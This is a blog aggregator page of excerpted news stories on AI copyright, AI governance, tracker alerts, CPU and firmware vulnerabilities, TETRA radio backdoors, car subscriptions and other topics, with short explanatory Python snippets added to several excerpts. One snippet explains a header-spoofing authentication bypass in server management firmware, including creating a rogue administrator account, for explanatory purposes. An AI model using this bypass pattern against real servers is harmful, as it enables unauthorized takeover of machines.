The Linkielist

Linking ideas with the world

AI Creation and Copyright: Unraveling the debate on originality, ownership

Whether AI systems can create original work sparks intense discussions among philosophers, jurists, and computer scientists and touches on issues of ownership, copyright, and economic competition, writes Stefano Quintarelli.

Stefano Quintarelli is an information technology specialist, a former member of the Italian Parliament and a former member of the European Commission’s High-level expert group on Artificial Intelligence.

Did Jesus Christ own the clothing he wore? In Umberto Eco’s landmark book “The Name of the Rose,” this is the central issue that is hotly debated by senior clergy, leading to internecine warfare. What is at stake is nothing less than the legitimacy of the church to own private property — and for clergy to grow rich in the process — since if Jesus did it then it would be permitted for his faithful servants.

Although it may not affect the future of an entity quite as dominant as the Catholic church, a similarly vexatious question is sparking heated debate today: Namely, can artificial intelligence systems create original work, or are they just parrots who repeat what they are told? Is what they do similar to human intelligence, or are they just echoes of things that have already been created by others?

In this case, the debate is not among senior clergy, but philosophers, jurists and computer scientists (those who specialise in the workings of the human brain seem to be virtually absent from the discussion). Instead of threatening the wealth of the church, the answer to the question of machine intelligence raises issues that affect the ownership and wealth that flows from all human works.

Large language models (LLMs) such as Bard and ChatGPT are built by ingesting huge quantities of written material from the internet and learning to make connections and correlations between the words and phrases in those texts. The question is: When an AI engine produces something, is it generating a new creative work, as a human would, or is it merely generating a derivative work?
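
To make that concrete, here is a deliberately tiny sketch of “learning correlations between words” — a bigram model in Python. Real LLMs learn billions of parameters over token sequences with neural networks rather than a lookup table, so treat this only as an illustration of the statistical idea, not of how Bard or ChatGPT are built.

```python
# Toy bigram "language model": count which word follows which,
# then generate text by sampling from those counts.
from collections import Counter, defaultdict
import random

corpus = "the cat sat on the mat the dog sat on the rug".split()

# Learn correlations: how often each word follows each other word.
following = defaultdict(Counter)
for prev, nxt in zip(corpus, corpus[1:]):
    following[prev][nxt] += 1

def generate(word, length=6):
    out = [word]
    for _ in range(length):
        counts = following.get(out[-1])
        if not counts:
            break
        words, weights = zip(*counts.items())
        # Sample the next word in proportion to how often it followed.
        out.append(random.choices(words, weights=weights)[0])
    return " ".join(out)

print(generate("the"))  # e.g. "the cat sat on the mat the"
```

Whether output produced this way is a new work or a derivative of the corpus is exactly the question the article poses.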

If the answer is that a machine does not ‘learn’, and therefore only synthesises or parrots existing work rather than ‘creating’, then for legal and copyright purposes its output could be considered a work derived from existing texts, and therefore not its own creative work with all the rights that would be included.

In the early years of the commercial web, there was a similar debate over whether hyperlinks and short excerpts from articles or web pages should be considered derivative works. Those who believed they were, argued that Google should have to pay royalties on those links and excerpts when it included them in its search results.

My position at the time was that links with short excerpts should not be considered a derivative work, but rather a new kind of service that helped bring those works to a different audience, and therefore didn’t compete with the economic interests of the authors of those works or owners of those sites. Not only did the links or excerpts not cause them harm, they did the exact opposite.

This argument and extensions of it formed the basis for the birth of economic giants such as Google and Facebook, which could not have existed if they had to pay a ‘link tax’ for the content they indexed and linked to (although recent laws in countries such as Australia and Canada have changed that to some extent, and have forced Google and Facebook to pay newspapers for linking to their content).

But large language models don’t just produce links or excerpts. The responses they provide don’t lead the user to the original texts or sites, but instead become a substitute for them. The audience is arguably the same, and therefore there is undoubtedly economic competition. A large language model could become the only interface for access to and economic exploitation of that information.

It seems obvious that this will become a political issue in both the US and Europe, although the question of its legality could result in different answers, since the United States has a legal tradition of ‘fair use’, which allows companies such as Google to use work in various ways without having to license it, and without infringing on an owner’s copyright.

In Europe, no such tradition exists (British Commonwealth countries have a similar concept called ‘fair dealing,’ but it is much weaker).

It’s probably not a coincidence that the companies that created these AI engines are reluctant to say what texts or content the models were built on, since transparency could facilitate possible findings of copyright infringement (a number of prominent authors are currently suing OpenAI, owner of ChatGPT, because they believe their work was ingested by its large language model without permission).

A problem within the problem is that the players who promote these systems typically enjoy dominant positions in their respective markets, and are therefore not subject to special obligations to open up or become transparent. This is what happened with the ‘right to link’ that led the web giants to become gatekeepers — the freedom to link or excerpt created huge value that caused them to become dominant.

It’s not clear that the solution to these problems is to further restrict copyright so as to limit the creation of new large language models. In thinking about what measures to apply and how to evolve copyright in the age of artificial intelligence, we ought to think about rules that will also help open up downstream markets, not cement the market power that existing gatekeepers already have.

When the creators of AI talk about building systems that are smarter than humans, and defend their models as more than just ‘stochastic parrots’ who repeat whatever they are told, we need to keep in mind that these are more than just purely philosophical statements. There are significant economic interests involved, including the future exploitation of the wealth of information produced to date. And that rivals anything except possibly the wealth of the Catholic Church in the 1300s, when Eco’s hero, William of Baskerville, was asking questions about private property.

Source: AI Creation and Copyright: Unraveling the debate on originality, ownership – EURACTIV.com

US-EU AI Code of Conduct: First Step Towards Transatlantic Pillar of Global AI Governance?

The European Union, G7, United States, and United Kingdom have announced initiatives aiming to establish governance regimes and guidelines around the technology’s use.

Amidst these efforts, an announcement made in late May by EU Executive Vice-President Margrethe Vestager at the close of the Fourth Trade and Technology Council (TTC) Ministerial in Sweden revealed an upcoming U.S.-EU “AI Code of Conduct.”

This measure represents a first step in laying the transatlantic foundations for global AI governance.

The AI Code of Conduct was presented as a joint U.S.-EU initiative to produce a draft set of voluntary commitments for businesses to adopt. It aims to bridge the gap between different jurisdictions by developing a set of non-binding international standards for companies developing AI systems ahead of legislation being passed in any country.

The initiative aims to go beyond the EU and U.S. to eventually involve other countries, including Indonesia and India, and ultimately be presented before the G7.

At present, questions remain surrounding the scope of the Code of Conduct and whether it will contain monitoring or enforcement mechanisms.

The AI Code of Conduct – coupled with other TTC deliverables emerging from the U.S.-EU Joint AI Roadmap – signals a path forward for the emergence of a transatlantic pillar of global AI governance.

Importantly, this approach circumvents questions of regulatory alignment and creates room for a broader set of multilateral actors, as well as the private sector.

[…]

Source: US-EU AI Code of Conduct: First Step Towards Transatlantic Pillar of Global AI Governance? – EURACTIV.com

Android phones can now tell you if there’s an AirTag following you

When Google announced that trackers would be able to tie in to its 3 billion-device Bluetooth tracking network at its Google I/O 2023 conference, it also said that it would make it easier for people to avoid being tracked by trackers they don’t know about, like Apple AirTags.

Now Android users will soon get these “Unknown Tracker Alerts.” Based on the joint specification developed by Google and Apple, and incorporating feedback from tracker-makers like Tile and Chipolo, the alerts currently work only with AirTags, but Google says it will work with tag manufacturers to expand its coverage.

Android’s unknown tracker alerts, illustrated in moving Corporate Memphis style.

For now, if an AirTag you don’t own “is separated from its owner and determined to be traveling with you,” a notification will tell you this and that “the owner of the tracker can see its location.” Tapping the notification brings up a map tracing back to where it was first seen traveling with you. Google notes that this location data “is always encrypted and never shared with Google.”
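
The joint specification is not reproduced in the article, but the underlying idea is simple enough to sketch: an unknown tracker that keeps appearing in your phone’s Bluetooth scans across distinct locations is probably travelling with you. Everything below — field names, the three-location threshold — is an illustrative assumption, not Google’s or Apple’s actual logic.

```python
# Sketch of an "unknown tracker alert" heuristic (assumptions, not the spec).
from dataclasses import dataclass, field

@dataclass
class Sighting:
    tracker_id: str
    location: tuple  # coarse (lat, lon)

@dataclass
class TrackerMonitor:
    my_devices: set                           # tags you own or are paired to
    seen: dict = field(default_factory=dict)  # tracker_id -> distinct locations

    def observe(self, s: Sighting, min_locations: int = 3) -> bool:
        """Return True if this sighting should raise an alert."""
        if s.tracker_id in self.my_devices:
            return False  # your own tag travelling with you is expected
        locs = self.seen.setdefault(s.tracker_id, set())
        locs.add(s.location)
        # An unknown tag seen with you in several distinct places
        # looks like it is following you.
        return len(locs) >= min_locations
```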

Finally, Google offers a manual scan feature if you’re suspicious that your Android phone isn’t catching a tracker or want to see what’s nearby. The alerts are rolling out through a Google Play services update to devices on Android 6.0 and above over the coming weeks.

[…]

Source: Android phones can now tell you if there’s an AirTag following you

More than 1,300 UK experts call AI a force for good

An open letter signed by more than 1,300 experts says AI is a “force for good, not a threat to humanity”.

It was organised by BCS, the Chartered Institute for IT, to counter “AI doom”.

Rashik Parmar, BCS chief executive, said it showed the UK tech community didn’t believe the “nightmare scenario of evil robot overlords”.

In March, tech leaders including Elon Musk, who recently launched an AI business, signed a letter calling for a pause in developing powerful systems.

[…]

The letter argues: “The UK can help lead the way in setting professional and technical standards in AI roles, supported by a robust code of conduct, international collaboration and fully resourced regulation”.

By doing so, it says Britain “can become a global byword for high-quality, ethical, inclusive AI”.

In the autumn UK Prime Minister Rishi Sunak will host a global summit on AI regulation.

Source: More than 1,300 experts call AI a force for good – BBC News

Firmware vulnerabilities in millions of servers could give hackers superuser status

[…] The vulnerabilities reside inside firmware that Duluth, Georgia-based AMI makes for BMCs (baseboard management controllers). These tiny computers soldered into the motherboard of servers allow cloud centers, and sometimes their customers, to streamline the remote management of vast fleets of computers. They enable administrators to remotely reinstall OSes, install and uninstall apps, and control just about every other aspect of the system—even when it’s turned off. BMCs provide what’s known in the industry as “lights-out” system management.

[…]

These vulnerabilities range in severity from High to Critical, including unauthenticated remote code execution and unauthorized device access with superuser permissions. They can be exploited by remote attackers with access to Redfish remote management interfaces, or from a compromised host operating system. Redfish is the successor to traditional IPMI and provides an API standard for the management of a server’s infrastructure and other infrastructure supporting modern data centers. Redfish is supported by virtually all major server and infrastructure vendors, as well as the OpenBMC firmware project often used in modern hyperscale environments.

[…]

The researchers went on to note that if they could locate the vulnerabilities and write exploits after analyzing the publicly available source code, there’s nothing stopping malicious actors from doing the same. And even without access to the source code, the vulnerabilities could still be identified by decompiling BMC firmware images. There’s no indication malicious parties have done so, but there’s also no way to know they haven’t.

The researchers privately notified AMI of the vulnerabilities, and the company created firmware patches, which are available to customers through a restricted support page. AMI has also published an advisory.

The vulnerabilities are:

  • CVE-2023-34329, an authentication bypass via HTTP headers, with a severity rating of 9.9 out of 10, and
  • CVE-2023-34330, code injection via the Dynamic Redfish Extension, with a severity rating of 8.2.

[…]

“By spoofing certain HTTP headers, an attacker can trick BMC into believing that external communication is coming in from the USB0 internal interface,” the researchers wrote. “When this is combined on a system shipped with the No Auth option configured, the attacker can bypass authentication, and perform Redfish API actions.”

One example would be to create an account that poses as a legitimate administrator and holds all the system rights afforded a real one.
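
The pattern behind CVE-2023-34329 can be sketched in a few lines. The advisory does not name the trusted headers, so the header name below is a placeholder assumption; the point is the anti-pattern of deriving trust from client-controlled input.

```python
# Anti-pattern sketch, not AMI's code: deciding trust from a header.

def is_internal_request(headers: dict) -> bool:
    # BROKEN: any remote client can set this header themselves.
    # (Header name is hypothetical; the advisory only says "certain
    # HTTP headers" made traffic look like it came from USB0.)
    return headers.get("X-Source-Interface") == "usb0"

def may_skip_authentication(headers: dict, no_auth_configured: bool) -> bool:
    # On systems shipped with the "No Auth" option, an apparently
    # internal request bypasses authentication entirely, giving the
    # attacker ordinary Redfish API access -- e.g. a POST to
    # /redfish/v1/AccountService/Accounts to create an administrator.
    return no_auth_configured and is_internal_request(headers)
```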

CVE-2023-34330, meanwhile, can be exploited on systems with the No Auth option enabled to execute code of the attacker’s choice. In the event the No Auth option isn’t enabled, attackers first must have BMC credentials. That’s a higher bar, but by no means out of reach for sophisticated actors.

[…]

Source: Firmware vulnerabilities in millions of computers could give hackers superuser status | Ars Technica

Janus, ‘two-faced’ hydrogen / helium white dwarf star

Scientists have observed a white dwarf star – a hot stellar remnant that is among the densest objects in the cosmos – that they have nicknamed Janus owing to the fact it has the peculiar distinction of being composed of hydrogen on one side and helium on the other.

[…]

The star is located in our Milky Way galaxy about 1,300 light years from Earth in the direction of the Cygnus constellation. A light year is the distance light travels in a year, 5.9 trillion miles (9.5 trillion km).

Janus is fairly massive for a white dwarf, with a mass 20% larger than that of our sun compressed into an object with a diameter half that of Earth. It rotates on its axis every 15 minutes – very fast considering these stars usually rotate every few hours to a few days.

“White dwarfs form at the very end of a star’s life. About 97% of all stars are destined to become white dwarfs when they die,” Caiazzo said.

[…]

After a white dwarf forms, its heavier elements are thought to sink to the star’s core while its lighter elements – hydrogen being the lightest, followed by helium – float to the top. This layered structure is believed to be destroyed at a certain stage in the evolution of some white dwarfs when a strong mixing blends the hydrogen and helium together.

Janus may represent a white dwarf in the midst of this transitional blending process, but with the puzzling development of one side being hydrogen while the other side is helium.

The researchers suspect that its magnetic field may be responsible for this asymmetry. If the magnetic field is stronger on one side than the other, as is often the case with celestial objects, one side could have less mixing of elements, becoming hydrogen heavy or helium heavy.

“Many white dwarfs are expected to go through this transition, and we might have caught one in the act because of its magnetic field configuration,” Caiazzo said.

[…]

Source: Introducing Janus, the exotic ‘two-faced’ white dwarf star | Reuters

Google Urges Gmail Users to Enable ‘Enhanced Safe Browsing’ for Faster, More Proactive Protection – but also takes screenshots of your browsing habits

The Washington Post’s “Tech Friend” newsletter has the latest on Google’s “Enhanced Safe Browsing” for Chrome and Gmail, which “monitors the web addresses of sites that you visit and compares them to constantly updated Google databases of suspected scam sites.” You’ll see a red warning screen if Google believes you’re on a website that is, for example, impersonating your bank. You can also check when you’re downloading a file to see if Google believes it might be a scam document. In the normal mode without Enhanced Safe Browsing, Google still does many of those same security checks. But the company might miss some of the rapid-fire activity of crooks who can create a fresh bogus website minutes after another one is blocked as a scam.
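
Safe Browsing-style checks are typically built around hashed URL prefixes, so the browser doesn’t ship your full browsing history to the server: a local set of short hash prefixes is consulted first, and only a prefix hit triggers a server lookup of the full hash. The sketch below illustrates that general design; it is not Google’s actual protocol or data.

```python
# Hash-prefix URL check, in the style of Safe Browsing (illustrative only).
import hashlib

local_prefixes = {b"\x1a\x2b\x3c\x4d"}  # hypothetical 4-byte prefixes

def needs_server_check(url: str) -> bool:
    digest = hashlib.sha256(url.encode()).digest()
    # Only a prefix match warrants asking the server about the full hash,
    # so the provider does not learn every URL you visit.
    return digest[:4] in local_prefixes

# A real client canonicalizes each URL into many host/path variants
# before hashing; that step is omitted here.
print(needs_server_check("http://scam.example/login"))
```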

This enhanced security feature has been around for three years, but Google recently started putting a message in Gmail inboxes suggesting that people turn on Enhanced Safe Browsing.

Security experts told me that it’s a good idea to turn on this safety feature but that it comes with trade-offs. The company already knows plenty about you, particularly when you’re logged into Gmail, YouTube, Chrome or other Google services. If you turn on Enhanced Safe Browsing, Google may know even more about what sites you’re visiting even if you’re not signed into a Google account. It also collects bits of visual images from sites you’re visiting to scan for hallmarks of scam sites.

Google said it will only use this information to stop bad guys and train its computers to improve security for you and everyone else. You should make the call whether you are willing to give up some of your privacy for extra security protections from common crimes.
Gmail users can toggle the feature on or off in their Google account settings. Google tells users that enabling the feature will provide “faster and more proactive protection against dangerous websites, downloads, and extensions.”

The Post’s reporter also asked Google why it doesn’t just enable the extra security automatically, and “The company told me that because Google is collecting more data in Enhanced Safe Browsing mode, it wants to ask your permission.”

The Post adds as an aside that “It’s also not your fault that phishing scams are everywhere. Our whole online security system is unsafe and stupid… Our goal should be to slowly replace the broken online security system with newer technologies that ditch our crime-prone password system for different methods of verifying we are who we say we are.”

Source: Google Urges Gmail Users to Enable ‘Enhanced Safe Browsing’ for Faster, More Proactive Protection – Slashdot

TETRA Military and Police Radio Code Encryption Has a Flaw: A Built-in Backdoor

For more than 25 years, a technology used for critical data and voice radio communications around the world has been shrouded in secrecy to prevent anyone from closely scrutinizing its security properties for vulnerabilities.

[…]

The backdoor, known for years by vendors that sold the technology but not necessarily by customers, exists in an encryption algorithm baked into radios sold for commercial use in critical infrastructure. It’s used to transmit encrypted data and commands in pipelines, railways, the electric grid, mass transit, and freight trains. It would allow someone to snoop on communications to learn how a system works, then potentially send commands to the radios that could trigger blackouts, halt gas pipeline flows, or reroute trains.

Researchers found a second vulnerability in a different part of the same radio technology that is used in more specialized systems sold exclusively to police forces, prison personnel, military, intelligence agencies, and emergency services, such as the C2000 communication system used by Dutch police, fire brigades, ambulance services, and Ministry of Defense for mission-critical voice and data communications. The flaw would let someone decrypt encrypted voice and data communications and send fraudulent messages to spread misinformation or redirect personnel and forces during critical times.

[…]

The Dutch National Cyber Security Centre assumed the responsibility of notifying radio vendors and computer emergency response teams around the world about the problems, and of coordinating a timeframe for when the researchers should publicly disclose the issues.

In a brief email, NCSC spokesperson Miral Scheffer called TETRA “a crucial foundation for mission-critical communication in the Netherlands and around the world” and emphasized the need for such communications to always be reliable and secure, “especially during crisis situations.” She confirmed the vulnerabilities would let an attacker in the vicinity of impacted radios “intercept, manipulate or disturb” communications and said the NCSC had informed various organizations and governments, including Germany, Denmark, Belgium, and England, advising them how to proceed.

[…]

The researchers plan to present their findings next month at the Black Hat security conference in Las Vegas, when they will release detailed technical analysis as well as the secret TETRA encryption algorithms that have been unavailable to the public until now. They hope others with more expertise will dig into the algorithms to see if they can find other issues.

[…]

Although the standard itself is publicly available for review, the encryption algorithms are only available with a signed NDA to trusted parties, such as radio manufacturers. The vendors have to include protections in their products to make it difficult for anyone to extract the algorithms and analyze them.

[…]

Source: TETRA Radio Code Encryption Has a Flaw: A Backdoor | WIRED

AMD ‘Zenbleed’ bug allows Meltdown-like data leakage

AMD has started issuing some patches for its processors affected by a serious silicon-level bug dubbed Zenbleed that can be exploited by rogue users and malware to steal passwords, cryptographic keys, and other secrets from software running on a vulnerable system.

Zenbleed affects Ryzen and Epyc Zen 2 chips, and can be abused to swipe information at a rate of at least 30Kb per core per second. That’s practical enough for someone on a shared server, such as a cloud-hosted box, to spy on other tenants. Exploiting Zenbleed involves abusing speculative execution, though unlike the related Spectre family of design flaws, the bug is pretty easy to exploit. It is more on a par with Meltdown.

Malware already running on a system, or a rogue logged-in user, can exploit Zenbleed without any special privileges and inspect data as it is being processed by applications and the operating system, which can include sensitive secrets, such as passwords. It’s understood a malicious webpage, running some carefully crafted JavaScript, could quietly exploit Zenbleed on a personal computer to snoop on this information.

The vulnerability was highlighted today by Google infosec guru Tavis Ormandy, who discovered the data-leaking vulnerability while fuzzing hardware for flaws, and reported it to AMD in May. Ormandy, who acknowledged some of his colleagues for their help in investigating the security hole, said AMD intends to address the flaw with microcode upgrades, and urged users to “please update” their vulnerable machines as soon as they are able to.

Proof-of-concept exploit code, produced by Ormandy, is publicly available, and we’ve confirmed it works on a Zen 2 Epyc server system when running on the bare metal. While the exploit runs, it shows off the sensitive data being processed by the box, which can appear in fragments or in whole depending on the code running at the time.

If you stick any emulation layer in between, such as Qemu, then the exploit understandably fails.

What’s hit?

The bug affects all AMD Zen 2 processors including the following series: Ryzen 3000; Ryzen Pro 3000; Ryzen Threadripper 3000; Ryzen 4000 Pro; Ryzen 4000, 5000, and 7020 with Radeon Graphics; and Epyc Rome datacenter processors.
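
If you want a rough first check on Linux, the CPU family and model in /proc/cpuinfo narrow things down. Family 23 (0x17) is AMD’s Zen through Zen 2 family; the Zen 2 model ranges below are an assumption drawn from public documentation, so treat a match as “consult AMD-SB-7008”, not as a verdict.

```python
# Rough Zen 2 detector (model ranges are assumptions, not AMD's list).

def zen2_suspect(cpuinfo_text: str) -> bool:
    fields = {}
    for line in cpuinfo_text.splitlines():
        key, _, value = line.partition(":")
        fields.setdefault(key.strip(), value.strip())
    if fields.get("vendor_id") != "AuthenticAMD":
        return False
    family = int(fields.get("cpu family", "0"))
    model = int(fields.get("model", "0"))
    # Assumed Zen 2 models within family 0x17: Rome (0x31), Matisse
    # (0x71), Renoir/Lucienne (0x60/0x68), and relatives.
    zen2_models = set(range(0x30, 0x50)) | set(range(0x60, 0x80)) | {0x90, 0xA0}
    return family == 0x17 and model in zen2_models

with open("/proc/cpuinfo") as f:
    print("possibly affected:", zen2_suspect(f.read()))
```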

AMD today issued a security advisory, using the identifiers AMD-SB-7008 and CVE-2023-20593 to track the vulnerability. The chip giant scored the flaw as a medium severity one, describing it as a “cross-process information leak.”

A microcode patch for Epyc 7002 processors is available now. As for the rest of its affected silicon: AMD is targeting December 2023 for updates for desktop systems (eg, Ryzen 3000 and Ryzen 4000 with Radeon); October for high-end desktops (eg, Threadripper 3000); November and December for workstations (eg, Threadripper Pro 3000); and November to December for mobile (laptop-grade) Ryzens. Shared systems are the priority, it would seem, which makes sense given the nature of the design blunder.

[…]

Source: AMD ‘Zenbleed’ bug allows Meltdown-like data leakage

Mercedes: Pay us again to unlock full acceleration on EQS and EQE – yes, you already own the hardware

Mercedes-Benz has finalized pricing on its vexing “Acceleration Increase” subscription, revealed last year, which can eke out more electric performance — without any physical modification — from the automaker’s current EQE and EQS EV models, Car and Driver reports.

The updated Acceleration Increase pricing starts at $60 per month, or you can save about $120 and pay $600 per year instead. That pricing only applies to the AWD EQE 350 sedan and its SUV counterpart. Meanwhile, the pricier AWD EQS 450 car and SUV command a higher $90 per month (or $900 per year) rate for their own boost.

Mercedes-Benz had initially set the subscription at $1,200 per year, but now it’s been reduced a bit to a slightly-less-unreasonable rate. The automaker is also letting you pay a one-time fee of $1,950 on the EQE and $2,950 on the EQS to unlock the Acceleration Increase permanently.

The unlock increases acceleration and power output to the motors by 20 to 24 percent, according to Mercedes-Benz. The EQE’s 215kW total output increases to 260kW, and its 0–60 mph time decreases to 5.1 seconds (from 6) for the sedan and 5.2 seconds (from 6.2) on the SUV. Meanwhile, the EQS goes from 265kW to 330kW and decreases its 0–60 mph to 4.5 seconds (from 5.3) and 4.9 seconds (from 5.8) on the SUV.

Those who choose the monthly subscription would pay the equivalent of the full unlock in just under three years of owning either vehicle. It seems that Mercedes-Benz’s monthly pricing model is designed for customers who are leasing the vehicle for a short period or only want to show off the performance temporarily while taking visiting friends or family on joy rides.
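
The break-even arithmetic, using the article’s prices:

```python
# Months of subscribing before the one-time unlock would have been cheaper.
for model, monthly, one_time in (("EQE", 60, 1950), ("EQS", 90, 2950)):
    months = one_time / monthly
    print(f"{model}: {months:.1f} months (~{months / 12:.1f} years)")
# EQE: 32.5 months (~2.7 years)
# EQS: 32.8 months (~2.7 years)
```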

The era of automakers adding monthly subscriptions and microtransactions to vehicles is a troubling trend. Tesla was early to sell such options when it offered a $3,250 unlock to use the full battery capacity of some older Model S vehicles. More recently, heated seats have been subject to software locks and subscriptions from Tesla and BMW.

The EQS and EQE aren’t the only artificially nerfed electric cars to offer paid unlocks. Polestar offers a $1,195 one-time fee for a boost, and Tesla also has a performance unlock for its EVs. But if you really want a quick EV and you’re willing to pay over $100,000 for an EQS already, you have quicker options in the Tesla Model S Plaid or the AMG version of the EQS.

Source: Mercedes-Benz’s EQS and EQE can be uncorked with a monthly fee – The Verge

How is this legal? You bought the car and its accelerative capacity already. But they will make you pay again to use it?

AI shows classroom conversations predict academic success

Who would have thought in-class, off-topic dialog could be a significant predictor of a student’s success in school? Scientists at Tsinghua University had a hunch and decided to deep-dive into how AI may help an under-studied segment of the education pool: K-6th grade students learning in live, online classes.

By analyzing the classroom dialogs of these children, scientists at Tsinghua University developed neural network models to predict what behaviors may lead to a more successful student.
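
The paper’s actual neural network models and features are not reproduced in the article, but the shape of the task is easy to sketch: turn each student’s dialog into a handful of counts and fit a predictor. The toy below uses hypothetical features and plain logistic regression in place of the authors’ neural networks.

```python
# Illustrative behaviour-to-outcome predictor (not the Tsinghua models).
import numpy as np

rng = np.random.default_rng(0)

# Hypothetical per-student features:
# [off_topic_turns, higher_level_interactions, total_turns]
X = rng.poisson(lam=(3, 2, 20), size=(200, 3)).astype(float)
# Hypothetical labels loosely tied to participation, for demonstration.
y = (X @ np.array([0.4, 0.6, 0.1]) + rng.normal(size=200) > 4.0).astype(float)

w, b = np.zeros(3), 0.0
for _ in range(500):  # plain gradient descent on the logistic loss
    p = 1 / (1 + np.exp(-(X @ w + b)))
    w -= 0.1 * (X.T @ (p - y)) / len(y)
    b -= 0.1 * (p - y).mean()

print("learned feature weights:", w)  # which dialog behaviours carry signal
```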

[…]

The researchers published their results in the Journal of Social Computing on March 31. Valid findings were drawn from the recorded data and the models used, which can accurately predict student performance.

“The most important message from this paper is that high-performing students, regardless of whether they are enrolled in STEM or non-STEM courses, consistently exhibit more […], higher-level interactions concerning […], and active participation in off-topic dialogs throughout the lesson,” said Jarder Luo, author and researcher of the study.

The implication here is that above the other markers of a successful student, which are cognition and positive emotion, the most important predictor of performance for STEM and non-STEM students is the student’s interactive type. For STEM students, interactive type matters most during the middle stage of the lesson. In contrast, non-STEM students’ interactive types have about the same effect on performance during the middle and summary stages of the lesson.

Interactive dialog between students helps to streamline and integrate […] along with knowledge building; these open conversations help the young students navigate conversations generally, but more specifically conversations on topics the student is likely not very familiar with. This could be why the data so strongly suggests students more active in classroom dialog are typically higher-performing.

Additionally, the study also found that meta-cognition, that is, “thinking about thinking” is found to be more prevalent in higher-performing, non-STEM students than their STEM counterparts. This could be in part because science is often taught in a way that builds on a basis of knowledge, whereas other areas of study require a bit more planning and evaluation of the material.

[…]

Source: How AI can use classroom conversations to predict academic success

More information: Yuanyi Zhen et al, Prediction of Academic Performance of Students in Online Live Classroom Interactions—An Analysis Using Natural Language Processing and Deep Learning Methods, Journal of Social Computing (2023). DOI: 10.23919/JSC.2023.0007

Tesla directors agree to return $735 million following claims they were massively overpaid

Elon Musk, Larry Ellison and other current and former members of Tesla’s board of directors will return $735 million to settle claims that they massively overpaid themselves, Reuters has reported. The deal wraps up a saga that started in 2020, stemming from a lawsuit filed by a police and firefighter retirement fund challenging stock options granted to Tesla’s board starting in 2017. Directors also agreed not to receive compensation for 2021, 2022 and 2023, and to change the way compensation is calculated.

Tesla’s current board includes Elon Musk, his brother Kimbal, Fox News mogul James Murdoch, Airbnb co-founder Joe Gebbia and former Tesla CTO JB Straubel. The case is separate from a lawsuit filed by shareholders against a $56 billion compensation package awarded to CEO Elon Musk.

The Police and Fire Retirement System of the City of Detroit accused Tesla’s board of giving itself unfair and excessive compensation in the form of 11 million stock options between 2017 and 2020, saying it grossly exceeded norms for a corporate board. The $735 million settlement will be paid back to Tesla in what’s called a “derivative lawsuit” — the largest ever awarded by Delaware’s Court of Chancery, according to Reuters.

Tesla argued that stock options were used to ensure directors’ incentives were aligned with investor goals. Tesla has yet to comment on the affair, but said in court documents that it agreed to settle to eliminate the risk of future litigation.

Tesla CEO Elon Musk is fighting a separate lawsuit to defend his $56 billion pay package. It was brought by shareholder Richard Tornetta, who claimed that “the largest compensation grant in human history” was given to Musk even though he didn’t focus entirely on Tesla. In 2020, he received the first of 12 $700 million payments as part of that package.

Source: Tesla directors agree to return $735 million following claims they were massively overpaid

Paris 2024 Olympics: Concern over French plan for AI surveillance

Under a recent law, police will be able to use CCTV algorithms to pick up anomalies such as crowd rushes, fights or unattended bags.

The law explicitly rules out using facial recognition technology, as adopted by China, for example, in order to trace “suspicious” individuals.

But opponents say it is the thin end of the wedge. Even though the experimental period allowed by the law ends in March 2025, they fear the French government’s real aim is to make the new security provisions permanent.

“We’ve seen this before at previous Olympic Games like in Japan, Brazil and Greece. What were supposed to be special security arrangements for the special circumstances of the games, ended up being normalised,” says Noémie Levain, of the digital rights campaign group La Quadrature du Net (Squaring the Web).

[…]

“We will not – and cannot by law – provide facial recognition, so this is a wholly different operation from what you see in China,” he says.

“What makes us attractive is that we provide security, but within the framework of the law and ethics.”

But according to digital rights activist Noémie Levain, this is only a “narrative” that developers are using to sell their product – knowing full well that the government will almost certainly favour French companies over foreign firms when it comes to awarding the Olympics contracts.

“They say it makes all the difference that here there will be no facial recognition. We say it is essentially the same,” she says.

“AI video monitoring is a surveillance tool which allows the state to analyse our bodies, our behaviour, and decide whether it is normal or suspicious. Even without facial recognition, it enables mass control.

“We see it as just as scary as what is happening in China. It’s the same principle of losing the right to be anonymous, the right to act how we want to act in public, the right not to be watched.”

Source: Paris 2024 Olympics: Concern over French plan for AI surveillance – BBC News

Dual wavelengths of light shown to be effective against antibiotic-resistant superbug bacterium

Scientists have combined two light wavelengths to deactivate a bacterium that is invulnerable to some of the world’s most widely used antibiotics, giving hope that the regime could be adapted as a potential disinfectant treatment.

Under the guidance of project leader Dr. Gale Brightwell, scientists at New Zealand’s AgResearch demonstrated the novel antimicrobial efficiency of a combination of two light wavelengths against a ‘superbug’ known as antibiotic-resistant extended-spectrum beta-lactamase E. coli.

[…]

A combination of far-UVC (222 nm) and blue LED (405 nm) light has been shown to be effective in the inactivation of a wide range of microorganisms while being much safer to use and handle as compared to traditional UVC at 254 nm, she said.

“The E. coli we chose for this investigation were extended-spectrum beta-lactamase producing E. coli (ESBL-Ec), as these bacteria produce enzymes that break down and destroy commonly used antibiotics, including penicillins and cephalosporins, making these drugs ineffective for treating infections,” she said.

[…]

The team found that a combination of dual far-UVC and blue LED light could be used to disinfect both antibiotic-resistant and antibiotic-sensitive E. coli, offering a non-thermal technology that may not drive further antibiotic resistance.

However, if exposed to sub-lethal levels of the dual far-UVC and blue LED light, the antibiotic-resistant E. coli tested did exhibit light tolerance. One surprising finding was that this light tolerance was only exhibited by the antibiotic-resistant E. coli and not by the antibiotic-sensitive E. coli that was also tested.

Gardner says further work is needed to understand whether the light tolerance is due to a genetic change, or some other mechanism.

“It is also important to investigate the development of light tolerance in other antimicrobial-resistant bacteria and to determine the minimum dose of far-UVC light that can create light tolerance as well as the potential of further resistance development to other things such as sanitizers, heat, and pH in bacteria for application purposes,” she said.

The findings are published in the Journal of Applied Microbiology.

More information: Amanda Gardner et al, Light Tolerance of Extended Spectrum ß-lactamase Producing Escherichia coli Strains After Repetitive Exposure to Far-UVC and Blue LED Light, Journal of Applied Microbiology (2023). DOI: 10.1093/jambio/lxad124

Source: Dual wavelengths of light shown to be effective against antibiotic-resistant bacterium

Spain antitrust watchdog fines Amazon, Apple $218 million for collusion and exclusion

Spain’s antitrust watchdog on Tuesday said it had imposed fines worth a total of 194.1 million euros ($218.03 million) on Amazon (AMZN.O) and Apple (AAPL.O) for colluding to limit the online sale of devices from Apple and competitors in Spain.

The two contracts the companies signed on Oct. 31, 2018 granting Amazon the status of authorized Apple dealer included anti-competitive clauses that affected the online market for electronic devices in Spain, CNMC, as the watchdog is known, said in a statement.

Apple was fined 143.6 million euros and Amazon 50.5 million euros. The two companies have two months to appeal the decision.

[…]

“The two companies restricted without justification the number of sellers of Apple products on the Amazon website in Spain,” CNMC said.

More than 90% of the existing retailers who were using Amazon’s marketplace to sell Apple devices were blocked as a result, it added.

